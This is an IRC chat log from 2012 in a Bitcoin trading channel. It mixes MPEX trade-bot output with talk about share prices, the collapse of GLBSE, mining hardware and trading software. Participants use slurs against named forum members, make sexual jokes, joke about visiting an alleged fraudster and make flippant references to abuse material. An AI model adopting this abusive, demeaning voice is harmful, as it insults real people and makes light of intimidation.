Oct 31 20:43:26 and about this chan Oct 31 20:44:09 haha Oct 31 20:44:17 i am a great fan of tvtropes btw Oct 31 20:44:30 iirc when a girl pointed that site to me i got lost in there for 30 hours Oct 31 20:44:36 prolly read 500k words Oct 31 20:45:53 you see. then, when some dispute is imminent, just hand'em this combined trilema/tvtropes tranquilizer Oct 31 20:45:59 ahahahaaha Oct 31 20:46:09 i need a soup nazi Oct 31 20:47:43 MPOE-PR: Trope namer :DDDD Oct 31 20:48:16 haha Oct 31 20:48:33 an ACTUAL girl on the internet that everybody talks to as if it were some guy. Oct 31 20:48:58 in spite of her right boob flippantly falling out of her blouse Oct 31 20:50:12 fucking tvtropes Oct 31 20:50:24 she is hot as shit Oct 31 20:50:31 but she is mean Oct 31 20:50:41 those two seem to go together don't they Oct 31 20:50:43 no one likes a mean girl :$ Oct 31 20:50:45 :( Oct 31 20:50:57 i like mean girls. Oct 31 20:51:17 my aunt was a mean girl Oct 31 20:51:25 her children are scarred Oct 31 20:51:28 :P Oct 31 20:51:36 fuck the children. Oct 31 20:51:52 you dont have any children do you? Oct 31 20:51:56 ;) Oct 31 20:52:19 nope. Oct 31 20:52:34 i'm like chronos. Oct 31 20:52:42 or spike spiegal Oct 31 20:52:47 "i hate kids" Oct 31 20:53:02 i don't hate them, they just don't pay enough to be bothered. Oct 31 20:57:29 chronos had a son Oct 31 21:00:19 eventually. Oct 31 21:00:37 guy ended up teh master of the universe, too. Oct 31 21:00:41 i think that's informative. Oct 31 21:01:27 yeah his son did. but some say zeus castrated chronos like chronos did to uranus Oct 31 21:01:53 [MPEX] [S.MPOE] 18000 @ 0.00048 = 8.64 BTC [-] Oct 31 21:01:55 a well. ballz are overrated :D Oct 31 21:07:32 hehe http://www.room77.de/ Oct 31 21:10:21 what's that, german scat club ? Oct 31 21:10:30 http://www.npr.org/2012/06/01/154140277/berlin-restaurant-experiments-with-virtual-currency Oct 31 21:11:29 lo Oct 31 21:11:30 lol Oct 31 21:11:47 whoa Oct 31 21:11:53 mooe stock is hot Oct 31 21:11:58 mpoe Oct 31 21:12:14 smickles: monopoly tonight? Oct 31 21:12:44 kakobrekla o cool Oct 31 21:12:57 gotta check it out next im there then! Oct 31 21:13:12 yup Oct 31 21:16:30 live.coinbr.com looks epic nao :) Oct 31 21:16:45 o hey Oct 31 21:17:07 epic ? it looks like it's about to blow omg Oct 31 21:17:14 i don't want to sell more shares ;/ Oct 31 21:17:33 i dont have any left :\ Oct 31 21:18:00 [MPEX] [S.MPOE] 82000 @ 0.0005 = 41 BTC [+] Oct 31 21:18:00 haha i still have some left Oct 31 21:25:51 just computed value of my mpoe shares for first time in few months ... fuck i'm rich now! Oct 31 21:27:37 haha wd . Oct 31 21:27:54 i made some offer to forum ppls to get 10k share blocks a while back Oct 31 21:28:02 some claimed but some didn't. a well :p Oct 31 21:29:55 personal offers? completely missed that Oct 31 21:34:48 yeah, it was a list of people. Oct 31 21:35:20 https://bitcointalk.org/index.php?topic=112694.0 Oct 31 21:39:54 all together, my IPO investment value multiplied ~ 24x in euros ... fucking can't believe it. Oct 31 21:40:32 yuuup Oct 31 21:40:37 congrats boys Oct 31 21:40:48 jurov Oct 31 21:40:53 broker man Oct 31 21:41:08 jurov : mpoe.etf went up 1200% by the time it was dissolved. Oct 31 21:41:09 can i pm you and get broker advice? Oct 31 21:41:28 and that was in btc Oct 31 21:42:49 it clearly shows how inflationary currency those euros are Oct 31 21:44:02 [MPEX] [S.MPOE] 17900 @ 0.00048643 = 8.7071 BTC [-] Oct 31 21:44:03 [MPEX] [S.MPOE] 22000 @ 0.00048554 = 10.6819 BTC [-] Oct 31 21:44:43 i guess so. Oct 31 21:45:22 sell into the wall! lol Oct 31 21:45:50 there's a wall ? Oct 31 21:46:05 not really any wall. Oct 31 21:46:09 i checked lol Oct 31 21:46:19 not anymore Oct 31 21:46:21 there was Oct 31 21:46:51 mircea_popescu: wat Oct 31 21:46:57 dub hm ? Oct 31 21:46:58 you like gage? Oct 31 21:47:07 that dude is so fucking retarded it hurts Oct 31 21:47:26 sooo ? Oct 31 21:47:54 pigeons iirc threw a fit too. why do you all hate gage! Oct 31 21:48:44 cause there is enough diareah on the forum, don't encourage more Oct 31 21:51:31 joel wins that forum clearly Oct 31 21:51:45 Miscellaneous policy-based unjust factors such as 'withdrawal within the locus poenitentiae' Oct 31 21:51:47 loupgaroux is just a cronic masturbator, contradicts himself constantly Oct 31 21:51:47 for fucks sake. Oct 31 21:52:10 latin phrase "in locus poen" becomes within the locus on wikipedia Oct 31 21:52:15 ITS IN PLACE OF Oct 31 21:52:44 dub i like his posts stylistically. Oct 31 21:53:04 gage I get a distinct paranoid schizophrenic hillbilly signal from Oct 31 21:53:47 mircea_popescu: sure there is some wit to a few of his posts but he likes himself too much and really doesnt have a lot of depth Oct 31 21:53:51 [MPEX] [S.MPOE] 3000 @ 0.000475 = 1.425 BTC [-] Oct 31 21:54:11 he'll rant and rave on one subject and completely contradict himself in the next post Oct 31 21:54:18 well a forum isn't really the venue for depth is it ? Oct 31 21:54:56 not if you reward retards Oct 31 21:55:46 o come onh! i ruined btctalk, is that it ? Oct 31 21:55:57 haha yes! Oct 31 21:56:12 i dun goofed nao :( Oct 31 21:56:12 also, CP Oct 31 21:56:26 counterparty ? or the other cp ? Oct 31 21:56:39 channeling that ciuciu moron Oct 31 21:56:56 what ever happened to him anyway ? Oct 31 21:57:17 i lost the password for that account Oct 31 21:57:31 it's kinda funny when various internet entities who we are expected to treat like, you know, as if they were human beings, with rights and all Oct 31 21:57:40 fail to survive as long as some 4chan thing Oct 31 22:04:29 http://www.reddit.com/r/Bitcoin/comments/12eoxg/bitcoins_market_cap_is_at_wellover_100million_and/c6ui5li Oct 31 22:19:34 [MPEX] [S.MPOE] 8820 @ 0.00048137 = 4.2457 BTC [+] Oct 31 22:19:35 [MPEX] [S.MPOE] 26356 @ 0.00048792 = 12.8596 BTC [+] Oct 31 22:19:36 [MPEX] [S.MPOE] 4924 @ 0.00049519 = 2.4383 BTC [+] Oct 31 22:28:01 [MPEX] [S.DICE] 1820 @ 0.00339944 = 6.187 BTC [+] Oct 31 22:31:34 http://www.reddit.com/r/Bitcoin/comments/12f27g/how_btcusd_options_fared_in_2012_graph_porn/ << in case anyone missed this Oct 31 22:45:37 nice, but the II., IV., VI. graphs suck, sorry Oct 31 22:45:57 you can't compare the two depicted values Oct 31 22:46:28 nor get at least approximate numbers off them Oct 31 22:48:28 for example in II , can anyone guess to which weeks belong the two short position (red) spikes? Oct 31 22:50:40 mircea, maybe you should outsource all graphing (nudge, wink) Oct 31 22:51:49 jurov um Oct 31 22:51:59 are you working off the small versions or did you click the graphs ? Oct 31 22:52:43 magnification help a bit, but only a bit Oct 31 22:52:47 *helps Oct 31 22:54:23 but what's the problem exactly ? Oct 31 22:54:31 [MPEX] [S.MPOE] 4199 @ 0.00048679 = 2.044 BTC [-] Oct 31 22:55:50 nah, i don't feel like bitching today again, after that yesterday's letting off steam over jsonrpc :) Oct 31 22:55:54 lol Oct 31 22:56:06 if it bothers anyone else, please explain it to mircea Oct 31 22:57:22 but as to "which week" : the simple way to interpolate 3d graphs is to look at the angle gain. Oct 31 22:57:45 there's 140 px angle gain between front of front column and back of back column Oct 31 22:58:34 making them weeks 20 and 25 respectively Oct 31 22:59:11 okay Oct 31 22:59:15 (the angle gain you see in the right hand edge of the graph) Oct 31 22:59:42 bah, not very accessible to the angle blind Oct 31 22:59:59 ya well. supposedly 3d graphs look spiffier Oct 31 23:02:50 supposedly it's also possible to make things both spiffy and clearly readable Oct 31 23:03:57 well now that all depends. Oct 31 23:08:34 fuck I am old Oct 31 23:09:01 one 24 hour day at work and I'm broken Oct 31 23:09:09 [MPEX] [S.MPOE] 3000 @ 0.00048528 = 1.4558 BTC [-] Oct 31 23:09:24 in my youth I didn't need sleep at all :( Oct 31 23:10:36 in my youth i didn't work. Oct 31 23:12:44 mircea_popescu: you dont work now Oct 31 23:13:06 so ? Oct 31 23:13:09 4ever young Oct 31 23:13:18 but i do work. Oct 31 23:13:30 nuh uh Oct 31 23:13:43 you sit around in your playboy mansion and party Oct 31 23:14:27 haha or that. Oct 31 23:14:31 it is CEO work. Oct 31 23:15:01 so getting blowjobs from interns Oct 31 23:15:06 sounds like my kinda job Oct 31 23:15:11 where do i apply? Oct 31 23:16:13 for intern? Oct 31 23:16:36 hahaha Oct 31 23:21:29 juzus fuck. How many banking websites am I going to encounter which want me to enter a password on a page like 'http://dumbshits-r-us.bank.com' Oct 31 23:21:51 plaintext pw is no good people Oct 31 23:23:27 they have javascript rsa Oct 31 23:23:41 do not worry your prettyhead mr customer. Oct 31 23:23:48 this site in question has no js on it Oct 31 23:24:03 smickles it's a joke, prolly insider Oct 31 23:24:06 there's no js rsa Oct 31 23:24:23 heh, got me Oct 31 23:27:43 smickles ! Oct 31 23:28:42 thestringpuller ™ Oct 31 23:29:02 monopoly tonight? Oct 31 23:29:09 lets get mircea in Oct 31 23:29:19 take all his money lol jkjk Oct 31 23:29:29 i checked it out earlier, but... i ain't installing softwarez Oct 31 23:29:29 sure :) you going to actually be awake? Oct 31 23:30:43 mircea_popescu: you don't have a laptop that has nothing valuable on it? Oct 31 23:31:22 hm, that's a point. mk, lemme set something up. Oct 31 23:33:59 https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-ash4/397309_548804025146742_258329982_n.jpg Oct 31 23:34:56 [MPEX] [S.MPOE] 5197 @ 0.00048528 = 2.522 BTC [-] Oct 31 23:35:22 really? people don't make meatloaf anymore? Oct 31 23:44:17 :D Oct 31 23:45:36 well, it's actually 6, but there are 2 extra lines for readability Oct 31 23:45:54 smickles ok so listen, what's the website again ? Oct 31 23:46:13 *the* website? Oct 31 23:46:23 mpex.us ofc ;) Oct 31 23:46:55 for monopoly? one sec Oct 31 23:46:58 yup Oct 31 23:47:05 haha cute :p Oct 31 23:47:05 http://www.psmonopoly.com/download-monopoly Oct 31 23:47:08 ty Oct 31 23:47:11 it has the better client Oct 31 23:47:13 be online in 10 Oct 31 23:49:03 hm Oct 31 23:49:11 it if doenst require too much attention i can try as well Oct 31 23:51:56 meh, it won't install and i dun have the patience to debug it. Oct 31 23:52:15 laaaaazy Oct 31 23:52:57 hey, first time i touced windoze in years Oct 31 23:53:00 i should get props Nov 01 00:02:00 [MPEX] [S.MPOE] 23700 @ 0.00048551 = 11.5066 BTC [+] Nov 01 00:22:56 eww, windows :( Nov 01 00:26:22 people selling futures is doing this... Nov 01 00:27:15 [MPEX] [S.MPOE] 19903 @ 0.00048528 = 9.6585 BTC [-] Nov 01 00:30:44 [MPEX] [S.DICE] 443200 @ 0.0033845 = 1500.0104 BTC [-] Nov 01 00:34:36 ;;ticker Nov 01 00:34:37 BTCUSD ticker | Best bid: 11.16861, Best ask: 11.17980, Bid-ask spread: 0.01119, Last trade: 11.16861, 24 hour volume: 38005.85903264, 24 hour low: 10.70543, 24 hour high: 11.18799, 24 hour vwap: 10.98574 Nov 01 00:36:52 [MPEX] [O.BTCUSD.C100N] 1000 @ 0.42679787 = 426.7979 BTC [+] Nov 01 00:37:04 [MPEX] [O.BTCUSD.C110N] 800 @ 0.38438129 = 307.505 BTC [+] Nov 01 00:37:19 [MPEX] [O.BTCUSD.C120N] 600 @ 0.35136273 = 210.8176 BTC [+] Nov 01 00:37:26 [MPEX] [O.BTCUSD.C130N] 400 @ 0.32453329 = 129.8133 BTC [+] Nov 01 00:37:31 [MPEX] [O.BTCUSD.C140N] 200 @ 0.3026916 = 60.5383 BTC [+] Nov 01 00:39:40 0_o Nov 01 00:40:18 <@assbot> [MPEX] [S.DICE] 443200 @ 0.0033845 = 1500.0104 BTC [-] Nov 01 00:40:33 is that gsdpt? Nov 01 00:41:28 ugh. Nov 01 00:41:44 i don't think i can look Nov 01 00:46:21 almost every asset issuer on GLBSE is taking btc and leaving Nov 01 00:46:43 they got btc back? Nov 01 00:46:45 since nefario never gonna give the asset info Nov 01 00:46:59 some people got btc back Nov 01 00:47:06 I thought only people that personally contacted nefario through some secret handshake process got btc Nov 01 00:47:20 s/secret handshake/reacharound/ Nov 01 00:47:33 then nefario is a bigger fraud then estimated Nov 01 00:47:59 I live 200 km from him, maybe a visit? Nov 01 00:48:25 I'll contribute to your travel :) Nov 01 00:48:31 I give him a handshake PERSONALLY and he gives btc, deal Nov 01 00:48:38 send me a finger Nov 01 00:48:51 You get the arm ;) Nov 01 00:49:02 then I can give myself that reacharound Nov 01 00:49:13 and thats for sure ;) Nov 01 00:50:00 I email`d him, I called him, no response Nov 01 00:50:40 had more than 2K btc worth of assets and more than 200 btc cash, where is it?????????????? Nov 01 00:51:18 + ABM and FDBF (+ assets) Nov 01 00:51:31 sad. Nov 01 00:51:36 :( Nov 01 00:51:52 don't worry deadterra got paid Nov 01 00:52:00 oh and BTC-Mining Nov 01 00:52:15 PscyhoticBoy how many coins does your mining rig get you a day? Nov 01 00:52:23 sure, if you kneel Nov 01 00:52:31 but I am no ass licker Nov 01 00:53:13 4-5 btc sringpuller (ABM only has 1 single the rst is personal) Nov 01 00:53:41 I have about 10Gh/s Nov 01 00:54:01 im looking forward to 2015 or so, when asics have become well established, there's a few classic chip designs Nov 01 00:54:11 and some people are running > 10k units in dc floors Nov 01 00:54:28 when DMC is up and running Nov 01 00:54:32 (lol) Nov 01 00:54:36 making yotahashes a reality Nov 01 00:55:08 s Nov 01 00:55:23 in 2015 eveyone will be panicing about worthless 1st gen asics because BFL will have a nanotube asic out in november Nov 01 00:56:00 bfl makes it to 2015 ? Nov 01 00:56:19 sure thing is, this whole GLBSE, DMC, usagi and you name them I know more and you do too saga is kinda funny in a way Nov 01 00:56:58 it will generate 1.21yotahash and feed excess power it draws from the planck field back into the grid Nov 01 00:57:26 lolz Nov 01 00:57:40 PsychoticBoy it is funny in at least two ways Nov 01 00:57:55 one of them being, THAT GLBSE HAD JUST FINE CSS Nov 01 00:58:08 and also, its own domain. Nov 01 00:58:49 coincedence? or scam? Nov 01 00:58:55 no cp though Nov 01 00:59:02 lol Nov 01 00:59:33 cp is more for the hidden wiki ppl Nov 01 01:00:07 maybe its a good idea to add mpex to the hidden wiki Nov 01 01:00:11 lolz Nov 01 01:00:25 o, the HIDDEN wiki Nov 01 01:00:25 just kiddin Nov 01 01:00:37 you know kid din Nov 01 01:00:41 lolz Nov 01 01:00:47 I have to stop drinking Nov 01 01:00:59 yes THE hidden wiki Nov 01 01:01:19 lol he's having fun by himself. Nov 01 01:01:34 I am easly amused Nov 01 01:02:36 [MPEX] [S.MPOE] 32099 @ 0.00048181 = 15.4656 BTC [-] Nov 01 01:13:34 in [4~ we trustcrytpography Nov 01 01:13:39 ugh! Nov 01 01:13:45 in cryptography we trust Nov 01 01:13:49 such lag in this starbucks Nov 01 01:29:09 [MPEX] [S.MPOE] 6401 @ 0.00048181 = 3.0841 BTC [-] Nov 01 01:29:10 [MPEX] [S.MPOE] 11978 @ 0.00048137 = 5.7658 BTC [-] Nov 01 01:29:12 [MPEX] [S.MPOE] 23921 @ 0.00048052 = 11.4945 BTC [-] Nov 01 01:35:30 i summom the mircea_popescu Nov 01 01:35:38 summon* Nov 01 01:36:00 and challenge thee to monopoly Nov 01 01:36:50 why the fuck are all the options gone Nov 01 01:40:05 smickles pm real quick Nov 01 01:40:05 prolly bot is having vacation Nov 01 01:41:12 gone ? Nov 01 01:41:34 y did a bunch just get bought? Nov 01 01:42:10 for to has ? Nov 01 01:43:27 i smell conspiracy Nov 01 01:43:52 call me richard belzer Nov 01 01:48:24 thestringpuller: there is occasionally a gap b/t when mircea's bot cancels its orders and replaces them at a new price Nov 01 01:49:21 actually, bot puts quotes in with expiration times Nov 01 01:49:34 sometimes it doesn't run fast enough and the orders expire before new orders being put in Nov 01 01:49:41 (someother times it has two sets of orders in briefly) Nov 01 01:54:31 [MPEX] [S.MPOE] 27390 @ 0.00048052 = 13.1614 BTC [-] Nov 01 01:54:33 [MPEX] [S.MPOE] 9300 @ 0.00047901 = 4.4548 BTC [-] Nov 01 01:54:34 [MPEX] [S.MPOE] 3265 @ 0.00047668 = 1.5564 BTC [-] Nov 01 02:17:40 haha, unlike my attempts to cancel and quickly put new orders Nov 01 02:19:50 [MPEX] [S.MPOE] 41935 @ 0.00047668 = 19.9896 BTC [-] Nov 01 02:19:52 [MPEX] [S.MPOE] 1365 @ 0.00047666 = 0.6506 BTC [-] Nov 01 02:46:03 [MPEX] [S.MPOE] 17500 @ 0.00047666 = 8.3416 BTC [-] Nov 01 02:47:18 jurov : they cancel automatically cause the bot places them with expiration set. Nov 01 03:11:34 [MPEX] [S.MPOE] 20786 @ 0.00047859 = 9.948 BTC [+] Nov 01 03:37:09 [MPEX] [S.MPOE] 4114 @ 0.00047859 = 1.9689 BTC [+] Nov 01 03:37:09 [MPEX] [S.MPOE] 1099 @ 0.00047821 = 0.5256 BTC [-] Nov 01 03:39:43 yes, i cancelled tham manually Nov 01 04:02:28 [MPEX] [S.MPOE] 31200 @ 0.00047757 = 14.9002 BTC [-] **** BEGIN LOGGING AT Thu Nov 1 09:28:13 2012 Nov 01 09:35:23 [MPEX] [S.MPOE] 9000 @ 0.00048803 = 4.3923 BTC [+] Nov 01 09:35:25 [MPEX] [S.MPOE] 4800 @ 0.00048832 = 2.3439 BTC [+] Nov 01 10:00:35 [MPEX] [S.MPOE] 30320 @ 0.00049006 = 14.8586 BTC [+] Nov 01 10:00:37 [MPEX] [S.MPOE] 7480 @ 0.00049099 = 3.6726 BTC [+] Nov 01 10:17:15 http://www.theblaze.com/wp-content/uploads/2012/10/enhanced-buzz-wide-22152-1351692876-3.jpg Nov 01 10:17:18 this is kinda interesting Nov 01 10:25:57 [MPEX] [S.MPOE] 21248 @ 0.00049097 = 10.4321 BTC [-] Nov 01 10:51:03 [MPEX] [S.MPOE] 35100 @ 0.00048912 = 17.1681 BTC [-] Nov 01 10:51:05 [MPEX] [S.MPOE] 15500 @ 0.00048578 = 7.5296 BTC [-] Nov 01 11:16:27 [MPEX] [S.MPOE] 7669 @ 0.00049097 = 3.7652 BTC [+] Nov 01 11:16:29 [MPEX] [S.MPOE] 1794 @ 0.00049099 = 0.8808 BTC [+] Nov 01 11:22:41 yay, finally got marketcetera's web interface running Nov 01 11:22:43 Marketcetera Tradebase is a web-based reporting application for all of your trading activity. Nov 01 11:22:43 It can be used to view, create and modify positions, trades, accounts and equities. Nov 01 11:27:41 cool Nov 01 11:30:43 it seems to have no login, as if either its intended you run it in-house or you slap http auth over it or something Nov 01 11:31:11 just localhost:3000 and its like you are the head of IT for the whole brokerage Nov 01 11:32:12 but, what it talks to on the back end is your marketcetera order router which is hub all these components talk through Nov 01 11:32:45 so maybe its up to the stragegies your strategy engine or router uses to control which consoles can do what Nov 01 11:33:37 it looks like you can do anything but its using FIX protocol to communicate so maybe when you place and order you are not supposed to you will just get a rejected back Nov 01 11:39:12 knotwork: did you get the Marketcetera talking to OT? Nov 01 11:39:35 wrong channel Nov 01 11:39:40 I only a few minutes ago got it to talk at all, to my web browser Nov 01 11:40:39 probably to get it to talk to OT or to MPEx we would need to make a filter that translates FIX protocol orders/commands into OT or MPEx protocol Nov 01 11:41:25 its more for doing things like getting live quote streams from Yahoo Finance and placing orders on the NYSE or a Forex place etc Nov 01 11:42:13 [MPEX] [S.MPOE] 34961 @ 0.00049311 = 17.2396 BTC [+] Nov 01 11:42:18 but in principle one should be able to add more currency pairs for USD/BTC and so on, and use it to talk to any bitcoin exchange that can handle FIX protocol Nov 01 11:43:11 and maybe soon also use it to implement bitcoin exchanges and stock-exchanges that can talk to mainstream brokerages and forex exchanges and stockmarkets Nov 01 11:44:26 but first things first ... how to get that damn GLBSE bs resolved :) Nov 01 11:45:29 it's 9:45 in London Nov 01 11:46:42 it looks like marketcetera could implement distributed brokerages Nov 01 11:47:16 since when you design your strategies it looks like you could easily send all your orders to umpteen places at once Nov 01 11:47:41 so you could have servers all around the world with order places on any of them propagated to all of them Nov 01 11:47:47 I do not want to call him again :( . There are pople with way bigger portfolios than me but none of those fucktars have balls to call him up. Instead they spin stupid theories in the forum and scare themselves to believing that shit they write. Nov 01 11:48:28 just set up a strategy that knows not to actually submit any orders from any of your other servers to the stock market, just submit them to your archives Nov 01 11:50:05 EskimoBob what do you suppose calling some loser based in london is to achieve ? Nov 01 11:50:17 if they want to cyber they prolly call an ex. Nov 01 11:50:20 it looks like distributed markets should be easy too, since it seems to be designed so you can set up strategies to do things like first see if you can settle orders between your own users, then see if other brokerages might be able to fill them, and only end up going to NYSE or whatever if brokerages cannot settle it among themselves Nov 01 11:53:01 clearly this web interface though it not for customers to come visit on your machine with their browsers Nov 01 11:53:21 it is for them to visit on their own machine's localhost:3000 with their browsers Nov 01 11:54:00 consulting their own machine's mysql database for their own positions and accounts and such Nov 01 11:54:49 and running their own order routing service on their own machine to route their orders to whichever exchanges or brokerages etc based on their own routing strategies Nov 01 11:55:42 so basically its for "power users", brokers and such Nov 01 11:57:11 "Marketcetera has captured with great clarity what an emerging high technology hedge fund is looking for. Their software is open, clear, powerful, broker-independent, and simple to get up and running." Nov 01 11:57:59 Marketcetera democratizes access to high frequency trading. Our Open Source Automated Trading Platform provides you with the agility to implement your new strategies in moments, even while you reduce your infrastructure costs. Download. Run. Trade. Nov 01 12:07:18 [MPEX] [S.MPOE] 7300 @ 0.00049311 = 3.5997 BTC [+] Nov 01 12:14:37 do you ever sleep? Nov 01 12:14:42 or is it like evening theree Nov 01 12:32:35 [MPEX] [S.MPOE] 1315 @ 0.00049311 = 0.6484 BTC [+] Nov 01 12:32:36 [MPEX] [S.MPOE] 39000 @ 0.00049424 = 19.2754 BTC [+] Nov 01 12:32:37 [MPEX] [S.MPOE] 4485 @ 0.00049447 = 2.2177 BTC [+] Nov 01 12:35:43 mircea_popescu: how many btc would I have to pay you to edit my paper? Nov 01 12:36:03 :) Nov 01 12:58:51 [MPEX] [S.MPOE] 900 @ 0.0004912 = 0.4421 BTC [-] Nov 01 13:24:13 [MPEX] [S.MPOE] 30700 @ 0.00049141 = 15.0863 BTC [+] Nov 01 13:24:14 [MPEX] [S.MPOE] 2393 @ 0.00049359 = 1.1812 BTC [+] Nov 01 13:49:25 [MPEX] [S.MPOE] 31883 @ 0.00049359 = 15.7371 BTC [+] Nov 01 14:14:50 [MPEX] [S.MPOE] 15376 @ 0.00049359 = 7.5894 BTC [+] Nov 01 14:14:52 [MPEX] [S.MPOE] 8724 @ 0.00049447 = 4.3138 BTC [+] Nov 01 14:19:01 ;;bc.stats Nov 01 14:19:02 Error: "bc.stats" is not a valid command. Nov 01 14:19:05 ;;bc,stats Nov 01 14:19:06 Error: invalid syntax (, line 1) Nov 01 14:19:14 you are invalid. Nov 01 14:20:35 try that help. It send you to a completely useless page Nov 01 14:33:30 hm still no reply from my casascius order 20 days ago Nov 01 14:35:27 thestringpuller edit your paper ?! Nov 01 14:40:01 [MPEX] [S.MPOE] 31387 @ 0.00049447 = 15.5199 BTC [+] Nov 01 15:03:28 sun is up soon and I'll take hike to the the shop to see what happened to "ART" tee/coffee cups Nov 01 15:06:48 [MPEX] [S.MPOE] 23237 @ 0.0004912 = 11.414 BTC [-] Nov 01 15:06:50 [MPEX] [S.MPOE] 21263 @ 0.00049086 = 10.4372 BTC [-] Nov 01 15:32:37 [MPEX] [S.MPOE] 296 @ 0.00049447 = 0.1464 BTC [+] Nov 01 15:32:39 [MPEX] [S.MPOE] 30183 @ 0.00049519 = 14.9463 BTC [+] Nov 01 15:57:52 [MPEX] [S.MPOE] 13956 @ 0.00049086 = 6.8504 BTC [-] Nov 01 15:59:33 "Yes, 2.0 was pretty much the beginning of all this, though I'd prefer the perspective they had when it was implemented as a command-line client." Nov 01 15:59:36 lmao this is hysterical Nov 01 15:59:52 "glbbq errs : became less like mpex" is the objection. yet they can't bring themselves to utter it. Nov 01 16:00:25 glbse didn't have options Nov 01 16:00:28 so it's not the same at all Nov 01 16:00:42 apples to rotten oranges :P Nov 01 16:06:50 this just discusses infrastructure Nov 01 16:06:56 i think they had a ssh-ish thing at some point Nov 01 16:15:55 !ticker s.dice Nov 01 16:15:57 [MPEX:S.DICE] 1day: 0.0033845 / 0.00338456 / 0.00339944 (445020 shares, 1,506.20 BTC), 30day: 0.0001 / 0.00300117 / 0.0034 (2108663 shares, 6,328.48 BTC) Nov 01 16:22:57 [MPEX] [S.MPOE] 30100 @ 0.0004885 = 14.7039 BTC [-] Nov 01 16:22:59 [MPEX] [S.MPOE] 1500 @ 0.00048824 = 0.7324 BTC [-] **** BEGIN LOGGING AT Fri Nov 2 01:21:26 2012 Nov 02 01:23:44 [MPEX] [S.MPOE] 7383 @ 0.00048369 = 3.5711 BTC [-] Nov 02 01:38:04 [MPEX] [B.MPCD.A] [PAID] 350000 @ 0.00002 = 7 BTC Nov 02 01:39:00 [MPEX] [B.MPCD.B] [PAID] 400000 @ 0.00003 = 12 BTC Nov 02 01:40:16 [MPEX] [B.MPCD.C] [PAID] 350000 @ 0.00009268 = 32.43671515 BTC Nov 02 01:49:02 [MPEX] [S.MPOE] 20500 @ 0.00048411 = 9.9243 BTC [+] Nov 02 01:49:04 [MPEX] [S.MPOE] 1600 @ 0.00048444 = 0.7751 BTC [+] Nov 02 01:50:52 o looky dividends spited out. Nov 02 01:52:07 wat is a MH/s worth today Nov 02 01:52:16 assuming nefario wasnt retarded Nov 02 01:53:31 hard to say Nov 02 01:53:36 I guess you look at price/diff at IPO and go from there Nov 02 01:54:22 but there are other factors like the general asshole prolapse in the market prior to nefardation Nov 02 01:55:34 [MPEX] [B.MPCD.B] [PAID] 400000 @ 0.00004054 = 16.21592105 BTC Nov 02 01:55:47 without applying any science I'd say somewhere between 0.05 and 0.01 Nov 02 01:56:09 maybe higher Nov 02 01:56:26 [MPEX] [B.MPCD.A] [PAID] 350000 @ 0.0001 = 35 BTC Nov 02 01:58:04 twitter says something different Nov 02 01:58:35 yeah quite possibly Nov 02 01:58:37 yea wtf happened there ?! Nov 02 01:58:48 i tested the parser on one case Nov 02 01:58:52 maybe two Nov 02 01:58:58 MPEx ‏@MPEx1 Nov 02 01:58:58 B.MPCD.A paid a total dividend of 350.00000000 BTC to 350`000 outstanding shares Nov 02 01:59:03 which is what it did Nov 02 01:59:33 twitter shows some 7BTC earlier Nov 02 01:59:44 for mpcd.a Nov 02 01:59:47 00:38.04 ( @assbot ) [MPEX] [B.MPCD.A] [PAID] 350000 @ 0.00002 = 7 BTC Nov 02 01:59:49 [MPEX] [B.MPCD.A] [PAID] 350000 @ 0.00002 = 7 BTC Nov 02 01:59:51 that too Nov 02 02:00:37 so you are saying i should be fixing this Nov 02 02:01:00 the 2nd one kakobrekla. Nov 02 02:01:07 why is it reported 35btc ? 350 were paid. Nov 02 02:01:41 wild guess? trailing zero. realliy? dunno till i check sauce. Nov 02 02:02:01 reality* Nov 02 02:02:04 :p Nov 02 02:02:06 :p Nov 02 02:02:16 did you check the site Nov 02 02:02:49 more words needed Nov 02 02:03:18 did you check the web site Nov 02 02:03:20 :D Nov 02 02:04:07 lol which one ? Nov 02 02:04:15 so, B.MPCD.A exists no more now? Nov 02 02:04:30 the one we discussed a few minutes ago on pm Nov 02 02:04:50 you know, the milk thingy... Nov 02 02:05:52 jurov the entire mpcd series is gone Nov 02 02:06:00 https://bitcointalk.org/index.php?topic=76515.msg1311976#msg1311976 Nov 02 02:06:03 there's accounting for it. Nov 02 02:14:35 [MPEX] [S.MPOE] 400 @ 0.00048444 = 0.1938 BTC [+] Nov 02 02:22:35 eh is the forum down ?! Nov 02 02:24:04 nope Nov 02 02:39:37 [MPEX] [S.MPOE] 12441 @ 0.00048444 = 6.0269 BTC [+] Nov 02 02:43:51 mircea_popescu: give me free money Nov 02 02:43:56 lololol Nov 02 02:44:11 O << free coin Nov 02 02:44:25 ;) Nov 02 02:44:30 gimme welfare plz Nov 02 02:45:41 thats the coin after it went to jail Nov 02 02:46:42 [MPEX] [F.GIGA.ETF] 10000 @ 0.00005078 = 0.5078 BTC [-] Nov 02 02:47:31 wow ?! Nov 02 02:52:36 gigaaaaa Nov 02 02:53:35 this reminds me of the dead parrot sketch Nov 02 02:53:44 it's pineing for the fjords... Nov 02 03:01:42 "32 stores on Etsy are now accepting the bitcoin currency" Nov 02 03:01:47 this is a big deal on reddit Nov 02 03:02:04 what is wrong with people ?! this is like saying 32 myspace pages are now supporting w/e petition >.< Nov 02 03:02:44 my father was selling zafferano there Nov 02 03:09:53 etsy you mean ? Nov 02 03:10:48 yep Nov 02 03:11:04 growing that shit is some fuckup up job. Nov 02 03:11:33 crocuses ? i never knew. Nov 02 03:11:35 it costs 10-15k euro per kg Nov 02 03:11:45 lol ya, and makes 2 kg an acre Nov 02 03:11:47 but its way better to just grow weed Nov 02 03:11:47 [MPEX] [S.MPOE] 19059 @ 0.00048444 = 9.2329 BTC [+] Nov 02 03:11:48 [MPEX] [S.MPOE] 14514 @ 0.00048468 = 7.0346 BTC [+] Nov 02 03:11:49 [MPEX] [S.MPOE] 3827 @ 0.00048497 = 1.856 BTC [+] Nov 02 03:11:54 1g/sq m Nov 02 03:12:49 ;;google acre to square meter Nov 02 03:12:50 Acres to Square Meters converter: ; Square Meters to Acres converter: ; Acres to Square Meter - Ask Numbers: Nov 02 03:13:14 1ac = 4046.8564m² Nov 02 03:13:19 so i was wrong, 4kg/acre :p Nov 02 03:15:25 what is zafferano? Nov 02 03:15:45 google says its a restaurant Nov 02 03:16:03 heh i googled it too Nov 02 03:16:07 http://it.wikipedia.org/wiki/Crocus_sativus Nov 02 03:16:30 dub saffron Nov 02 03:16:32 i have it in my garden Nov 02 03:16:35 ah Nov 02 03:16:49 well technically saffron is the product, crocus is the plant, zafferano is mostly the plant Nov 02 03:17:08 